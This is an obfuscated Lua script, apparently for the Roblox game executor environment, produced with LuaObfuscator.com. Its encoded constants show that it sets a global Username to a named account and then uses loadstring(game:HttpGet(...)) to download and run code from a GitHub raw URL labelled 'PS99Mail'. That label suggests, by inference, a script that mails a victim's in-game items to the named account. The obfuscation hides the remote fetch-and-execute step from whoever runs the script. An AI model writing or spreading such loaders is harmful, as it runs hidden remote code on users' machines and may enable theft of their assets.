--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v86=v2(v0(v31,16));if v20 then local v93=0;local v94;while true do if (v93==0) then v94=v5(v86,v20);v20=nil;v93=1;end if (v93==1) then return v94;end end else return v86;end end end);v18=1;end if (v18==7) then function v30(v32,v33,v34)local v35=v32[1];local v36=v32[2];local v37=v32[3];return function(...)local v70=v35;local v71=v36;local v72=v37;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v87=0,v78 do if (v87>=v72) then v76[v87-v72 ]=v77[v87 + 1 ];else v80[v87]=v77[v87 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v88=0;while true do if (v88==0) then v82=v70[v74];v83=v82[1];v88=1;end if (v88==1) then if (v83<=5) then if (v83<=2) then if (v83<=0) then v80[v82[2]]=v82[3];elseif (v83==1) then do return;end else local v118;local v119,v120;local v121;local v122;v34[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v34;else v80[v82[2]]=v34[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v34;else v80[v82[2]]=v34[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v122=v82[2];v121=v80[v82[3]];v80[v122 + 1 ]=v121;v80[v122]=v121[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v122=v82[2];v119,v120=v73(v80[v122](v13(v80,v122 + 1 ,v82[3])));v75=(v120 + v122) -1 ;v118=0;for v147=v122,v75 do v118=v118 + 1 ;v80[v147]=v119[v118];end v74=v74 + 1 ;v82=v70[v74];v122=v82[2];v80[v122]=v80[v122](v13(v80,v122 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end elseif (v83<=3) then local v114=0;local v115;while true do if (v114==0) then v115=v82[2];v80[v115]=v80[v115](v13(v80,v115 + 1 ,v75));break;end end elseif (v83>4) then local v132=v82[2];local v133,v134=v73(v80[v132](v13(v80,v132 + 1 ,v82[3])));v75=(v134 + v132) -1 ;local v135=0;for v152=v132,v75 do v135=v135 + 1 ;v80[v152]=v133[v135];end else v34[v82[3]]=v80[v82[2]];end elseif (v83<=8) then if (v83<=6) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v34;else v80[v82[2]]=v34[v82[3]];end elseif (v83>7) then v74=v82[3];else v80[v82[2]]();end elseif (v83<=9) then for v116=v82[2],v82[3] do v80[v116]=nil;end elseif (v83==10) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else local v142=v82[2];local v143=v80[v82[3]];v80[v142 + 1 ]=v143;v80[v142]=v143[v82[4]];end v74=v74 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24()local v38,v39,v40,v41=v1(v16,v19,v19 + (9 -6) );v19=v19 + (11 -7) ;return (v41 * 16777216) + (v40 * (126505 -60969)) + (v39 * (659 -403)) + v38 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v42==(9 -5)) then v51=nil;while true do if (v43~=(4 -2)) then else local v101=0 + 0 ;while true do if ((1289 -(993 + 295))~=v101) then else v43=8 -5 ;break;end if (v101~=0) then else v48=nil;v49=nil;v101=1 + 0 ;end end end if (v43~=(0 + 0)) then else local v102=1171 -(418 + 753) ;while true do if (v102==(1 -0)) then v43=1 + 0 ;break;end if (v102~=0) then else v44=0;v45=nil;v102=1 + 0 ;end end end if (v43==(1 + 3)) then while true do if (v44==(1 + 1)) then local v105=0 + 0 ;while true do if (v105==0) then v49=nil;v50=nil;v105=1 + 0 ;end if ((530 -(406 + 123))==v105) then v44=1772 -(1749 + 20) ;break;end end end if (v44==(1 + 2)) then v51=nil;while true do local v109=0 -0 ;local v110;local v111;while true do if (v109~=(1322 -(1249 + 73))) then else v110=0 + 0 ;v111=nil;v109=1;end if (v109==(1146 -(466 + 679))) then while true do if (v110==(0 -0)) then v111=0 -0 ;while true do if (v111~=(1901 -(106 + 1794))) then else if ((1 + 2)==v45) then local v165=0;local v166;while true do if (v165~=(0 + 0)) then else v166=0;while true do if (v166==(849 -(254 + 595))) then local v170=0 + 0 ;local v171;while true do if (v170==(0 -0)) then v171=0 -0 ;while true do if (v171==(114 -(4 + 110))) then local v183=584 -(57 + 527) ;while true do if (v183==(0 + 0)) then for v194=1 -0 ,v24() do v47[v194-(940 -(714 + 225)) ]=v29();end return v49;end end end end break;end end end end break;end end end if ((5 -3)~=v45) then else local v167=0;local v168;local v169;while true do if (v167~=(0 -0)) then else v168=0;v169=nil;v167=1 + 0 ;end if (v167~=(1428 -(41 + 1386))) then else while true do if (v168~=0) then else v169=806 -(118 + 688) ;while true do if (v169==0) then local v176=103 -(17 + 86) ;while true do if (v176==(0 + 0)) then for v187=1,v50 do local v188=0 + 0 ;local v189;local v190;local v191;local v192;while true do if (1~=v188) then else v191=nil;v192=nil;v188=6 -4 ;end if (v188~=(0 -0)) then else v189=0 -0 ;v190=nil;v188=98 -(11 + 86) ;end if ((5 -3)==v188) then while true do if (v189==(166 -(122 + 44))) then local v196=0 -0 ;local v197;while true do if (v196~=(0 -0)) then else v197=0 -0 ;while true do if (v197~=(1797 -(503 + 1293))) then else v189=3 -2 ;break;end if ((0 + 0)~=v197) then else local v209=0 + 0 ;while true do if (v209==(0 -0)) then v190=0;v191=nil;v209=66 -(30 + 35) ;end if (v209~=(1 + 0)) then else v197=1258 -(1043 + 214) ;break;end end end end break;end end end if (v189~=(3 -2)) then else v192=nil;while true do if ((1 + 0)~=v190) then else if (v191==1) then v192=v22()~=(533 -(43 + 490)) ;elseif (v191==(735 -(711 + 22))) then v192=v25();elseif (v191~=(1215 -(323 + 889))) then else v192=v26();end v51[v187]=v192;break;end if (v190~=(0 -0)) then else local v201=0 + 0 ;while true do if (v201==1) then v190=581 -(361 + 219) ;break;end if (v201==0) then local v210=0;while true do if (v210~=(320 -(53 + 267))) then else v191=v22();v192=nil;v210=1;end if (v210==(1 + 0)) then v201=1;break;end end end end end end break;end end break;end end end v49[3]=v22();v176=1;end if (v176~=(414 -(15 + 398))) then else v169=983 -(18 + 964) ;break;end end end if ((3 -2)~=v169) then else for v177=1 + 0 ,v24() do local v178=0 + 0 ;local v179;local v180;local v181;local v182;while true do if (v178==1) then v181=nil;v182=nil;v178=2;end if (v178==0) then v179=0;v180=nil;v178=1;end if ((852 -(20 + 830))==v178) then while true do if (v179==(0 + 0)) then v180=126 -(116 + 10) ;v181=nil;v179=1 + 0 ;end if (v179~=(739 -(542 + 196))) then else v182=nil;while true do if (v180==0) then local v198=0 -0 ;local v199;while true do if ((0 -0)~=v198) then else v199=0 + 0 ;while true do if (v199~=(0 + 0)) then else local v211=0 + 0 ;while true do if (v211~=0) then else v181=0 -0 ;v182=nil;v211=1;end if (v211~=(2 -1)) then else v199=1552 -(1126 + 425) ;break;end end end if (v199~=(1 + 0)) then else v180=406 -(118 + 287) ;break;end end break;end end end if (v180~=(1 + 0)) then else while true do if (v181==0) then v182=v22();if (v21(v182,3 -2 ,1122 -(118 + 1003) )==(0 -0)) then local v202=449 -(108 + 341) ;local v203;local v204;local v205;local v206;local v207;local v208;while true do if (v202~=(377 -(142 + 235))) then else v203=0 -0 ;v204=nil;v202=1 + 0 ;end if (2~=v202) then else v207=nil;v208=nil;v202=12 -9 ;end if (v202~=(1 + 2)) then else while true do if (v203==1) then local v212=977 -(553 + 424) ;while true do if (v212==(1 -0)) then v203=2;break;end if (v212==(0 + 0)) then v206=nil;v207=nil;v212=1 + 0 ;end end end if ((0 + 0)~=v203) then else local v213=0 + 0 ;while true do if ((1819 -(580 + 1239))==v213) then v204=0 + 0 ;v205=nil;v213=1 + 0 ;end if (1==v213) then v203=1;break;end end end if (v203==(4 -2)) then v208=nil;while true do if (v204==(0 + 0)) then v205=0 -0 ;v206=nil;v204=1 + 0 ;end if (v204==(2 -1)) then local v214=0 -0 ;while true do if (v214==0) then v207=nil;v208=nil;v214=1;end if (v214~=(1791 -(1010 + 780))) then else v204=2;break;end end end if (v204==(2 + 0)) then while true do if ((9 -7)==v205) then local v215=0;local v216;while true do if (v215==(0 + 0)) then v216=0;while true do if (v216==(0 -0)) then local v224=0 -0 ;while true do if (v224~=(1836 -(1045 + 791))) then else if (v21(v207,754 -(239 + 514) ,1 + 0 )~=(1 -0)) then else v208[2]=v51[v208[2]];end if (v21(v207,1331 -(797 + 532) ,2 + 0 )~=1) then else v208[2 + 1 ]=v51[v208[6 -3 ]];end v224=1;end if (v224~=(1203 -(373 + 829))) then else v216=732 -(476 + 255) ;break;end end end if (v216~=(1131 -(369 + 761))) then else v205=3;break;end end break;end end end if ((2 + 1)~=v205) then else if (v21(v207,3,5 -2 )==(1 -0)) then v208[4]=v51[v208[2 + 2 ]];end v46[v177]=v208;break;end if (v205~=(239 -(64 + 174))) then else local v218=0 + 0 ;while true do if (v218~=(0 + 0)) then else local v223=0 -0 ;while true do if (v223~=(337 -(144 + 192))) then else v218=217 -(42 + 174) ;break;end if (v223==(0 + 0)) then local v225=0 + 0 ;while true do if (v225~=(0 + 0)) then else v208={v23(),v23(),nil,nil};if (v206==(1504 -(363 + 1141))) then local v232=1580 -(1183 + 397) ;local v233;local v234;while true do if (v232~=(2 -1)) then else while true do if ((1455 -(990 + 465))~=v233) then else v234=0 + 0 ;while true do if (v234~=(0 + 0)) then else v208[3 + 0 ]=v23();v208[4]=v23();break;end end break;end end break;end if (v232~=(0 + 0)) then else v233=0;v234=nil;v232=1;end end elseif (v206==1) then v208[1978 -(1913 + 62) ]=v24();elseif (v206==(7 -5)) then v208[3]=v24() -(2^(11 + 5)) ;elseif (v206==3) then local v238=0;local v239;local v240;while true do if (v238==(2 -1)) then while true do if (v239~=(1933 -(565 + 1368))) then else v240=0 -0 ;while true do if ((0 -0)~=v240) then else v208[1664 -(1477 + 184) ]=v24() -((2 -0)^16) ;v208[2 + 2 ]=v23();break;end end break;end end break;end if (v238~=(0 + 0)) then else v239=856 -(564 + 292) ;v240=nil;v238=1;end end end v225=1 + 0 ;end if (v225==(1 + 0)) then v223=3 -2 ;break;end end end end end if (v218~=(1 -0)) then else v205=5 -3 ;break;end end end if (v205~=0) then else local v219=1469 -(1269 + 200) ;local v220;while true do if (v219==(0 -0)) then v220=304 -(244 + 60) ;while true do if (0==v220) then local v226=0 + 0 ;local v227;while true do if (v226==(815 -(98 + 717))) then v227=476 -(41 + 435) ;while true do if (v227==0) then local v235=1001 -(938 + 63) ;while true do if ((1 + 0)~=v235) then else v227=1 -0 ;break;end if (v235~=0) then else v206=v21(v182,2 -0 ,3);v207=v21(v182,1129 -(936 + 189) ,5 + 1 );v235=1 + 0 ;end end end if (v227~=(1 + 0)) then else v220=1 + 0 ;break;end end break;end end end if ((2 -1)~=v220) then else v205=1614 -(1565 + 48) ;break;end end break;end end end end break;end end break;end end break;end if (v202==(1 + 0)) then v205=nil;v206=nil;v202=2;end end end break;end end break;end end break;end end break;end end end v45=3;break;end end break;end end break;end end end break;end if ((1138 -(782 + 356))==v111) then local v163=0;local v164;while true do if (v163==(267 -(176 + 91))) then v164=0 -0 ;while true do if (v164~=(1 -0)) then else v111=1093 -(975 + 117) ;break;end if (v164==(1875 -(157 + 1718))) then if (v45==(0 + 0)) then local v172=0 -0 ;local v173;while true do if ((0 -0)~=v172) then else v173=1018 -(697 + 321) ;while true do if (v173~=1) then else v48={};v45=1;break;end if (v173==(0 -0)) then local v185=0 -0 ;while true do if ((0 -0)==v185) then local v193=1619 -(1427 + 192) ;while true do if (v193==(0 + 0)) then v46={};v47={};v193=1 + 0 ;end if (v193==(1 -0)) then v185=2 -1 ;break;end end end if (v185==(1228 -(322 + 905))) then v173=1 + 0 ;break;end end end end break;end end end if (v45==(612 -(602 + 9))) then local v174=0 + 0 ;local v175;while true do if (v174~=0) then else v175=326 -(192 + 134) ;while true do if (v175~=(1189 -(449 + 740))) then else local v186=872 -(826 + 46) ;while true do if (v186==(947 -(245 + 702))) then v49={v46,v47,nil,v48};v50=v24();v186=3 -2 ;end if (v186==(3 -2)) then v175=1 + 0 ;break;end end end if (v175==(1807 -(1202 + 604))) then v51={};v45=1900 -(260 + 1638) ;break;end end break;end end end v164=441 -(382 + 58) ;end end break;end end end end break;end end break;end end end break;end if (v44==(3 -2)) then local v106=0;while true do if (v106~=0) then else v47=nil;v48=nil;v106=1 + 0 ;end if (v106~=(1 -0)) then else v44=5 -3 ;break;end end end if (0~=v44) then else local v107=1205 -(902 + 303) ;local v108;while true do if (v107==(0 -0)) then v108=0 -0 ;while true do if (v108==(0 + 0)) then local v162=325 -(45 + 280) ;while true do if ((1691 -(1121 + 569))==v162) then v108=1;break;end if (v162==0) then v45=0 + 0 ;v46=nil;v162=215 -(22 + 192) ;end end end if ((684 -(483 + 200))~=v108) then else v44=1464 -(1404 + 59) ;break;end end break;end end end end break;end if (v43==(2 -1)) then local v103=0 + 0 ;while true do if (0==v103) then v46=nil;v47=nil;v103=1;end if (v103~=1) then else v43=2 -0 ;break;end end end if (v43==(768 -(468 + 297))) then local v104=0;while true do if (v104~=(562 -(334 + 228))) then else v50=nil;v51=nil;v104=3 -2 ;end if (v104~=(2 -1)) then else v43=1915 -(340 + 1571) ;break;end end end end break;end if (v42~=(0 -0)) then else v43=0;v44=nil;v42=1 + 0 ;end if (v42==(239 -(141 + 95))) then v49=nil;v50=nil;v42=4 + 0 ;end if (2==v42) then v47=nil;v48=nil;v42=8 -5 ;end if (v42~=1) then else v45=nil;v46=nil;v42=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v52=1034 -((360 -235) + 909) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==2) then v57=v21(v54,1969 -(1096 + 852) ,31);v58=((v21(v54,15 + 17 )==(1 -0)) and  -(1 + 0)) or (513 -(409 + 103)) ;v52=239 -(46 + 190) ;end if (v52==(95 -(51 + 44))) then v53=v24();v54=v24();v52=1 + 0 ;end if (v52==(1320 -((1795 -681) + 203))) then if (v57==(726 -(228 + 498))) then if (v56==(0 + 0)) then return v58 * (0 + 0) ;else v57=664 -(174 + 489) ;v55=0 -0 ;end elseif (v57==(3952 -(830 + 1075))) then return ((v56==(524 -(303 + (683 -462)))) and (v58 * ((1270 -(231 + 1038))/0))) or (v58 * NaN) ;end return v8(v58,v57-(853 + (1418 -(111 + 1137))) ) * (v55 + (v56/(2^((1372 -(91 + 67)) -((508 -337) + 991))))) ;end if ((4 -3)==v52) then v55=2 -1 ;v56=(v21(v54,1,49 -29 ) * (2^(26 + 6))) + v53 ;v52=6 -4 ;end end end v26=nil;function v26(v59)local v60;if  not v59 then local v89=0 + 0 ;while true do if (v89==(523 -(221 + 202 + 100))) then v59=v24();if (v59==(0 + (771 -(326 + 445)))) then return "";end break;end end end v60=v3(v16,v19,(v19 + v59) -(4 -3) );v19=v19 + v59 ;local v61={};for v84=2 -1 , #v60 do v61[v84]=v2(v1(v3(v60,v84,v84)));end return v6(v61);end v18=5;end if (v18==1) then v21=nil;function v21(v62,v63,v64)if v64 then local v90=0 -0 ;local v91;while true do if (v90==(0 -0)) then v91=(v62/((713 -(530 + 181))^(v63-((1828 -946) -(614 + 267)))))%((34 -(19 + 13))^(((v64-1) -(v63-(1 -0))) + (2 -1))) ;return v91-(v91%1) ;end end else local v92=((1817 -(1293 + 519)) -(5 -2))^(v63-(1 + 0)) ;return (((v62%(v92 + v92))>=v92) and (1 -0)) or 0 ;end end v22=nil;v18=2;end if (v18==2) then function v22()local v65=0;local v66;while true do if (v65==((2 + 0) -1)) then return v66;end if (v65==(0 -0)) then v66=v1(v16,v19,v19);v19=v19 + ((1 + 3) -3) ;v65=2 -1 ;end end end v23=nil;function v23()local v67=0 -0 ;local v68;local v69;while true do if (v67==0) then v68,v69=v1(v16,v19,v19 + 1 + 1 );v19=v19 + 1 + 1 ;v67=1 + 0 ;end if (v67==((3181 -2084) -(709 + 387))) then return (v69 * (2114 -(673 + 1185))) + v68 ;end end end v18=3;end end end v15("LOL!073O00028O0003083O00557365726E616D65030C3O00446176694D69737465725954030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00124O00014O0009000100013O00260A3O0002000100010004083O0002000100122O000100013O00260A00010005000100010004083O0005000100122O000200033O001202000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004083O000500010004083O001400010004083O000200012O00013O00017O00",v9(),...);
